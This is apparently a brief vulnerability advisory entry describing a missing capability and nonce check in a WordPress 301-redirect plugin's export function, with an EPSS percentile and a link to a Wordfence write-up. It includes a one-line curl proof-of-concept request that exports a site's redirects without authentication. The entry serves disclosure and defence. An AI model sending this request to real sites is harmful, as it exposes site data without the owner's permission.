EPSS
Percentile
47.0%
The export_data function of the plugin had no capability or nonce checks making it possible for unauthenticated users to export a site’s redirects.
curl -X POST --url "[URL]/wp-admin/admin-post.php?page=301options&export=true"
www.wordfence.com/blog/2021/05/severe-vulnerabilities-patched-in-simple-301-redirects-by-betterlinks-plugin/